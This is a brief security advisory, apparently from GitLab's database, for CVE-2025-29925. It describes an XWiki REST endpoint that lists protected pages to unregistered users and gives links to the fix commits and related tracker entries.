CVE-2025-29925: XWiki allows unregistered users to access private pages information through REST endpoint
Protected pages are listed when requesting the REST endpoints /rest/wikis/[wikiName]/pages even if the user doesn’t have view rights on them.
It’s particularly true if the entire wiki is protected with “Prevent unregistered user to view pages”: the endpoint would still list the pages of the wiki (actually it only impacts the main wiki due to XWIKI-22639).
References
- github.com/advisories/GHSA-22q5-9phm-744v
- github.com/xwiki/xwiki-platform
- github.com/xwiki/xwiki-platform/commit/1fb12d2780f37b34a1b4dfdf8457d97ce5cbb2df
- github.com/xwiki/xwiki-platform/commit/bca72f5ce971a31dba2a016d8dd8badda4475206
- github.com/xwiki/xwiki-platform/security/advisories/GHSA-22q5-9phm-744v
- jira.xwiki.org/browse/XWIKI-22630
- jira.xwiki.org/browse/XWIKI-22639
- nvd.nist.gov/vuln/detail/CVE-2025-29925
Detect and mitigate CVE-2025-29925 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →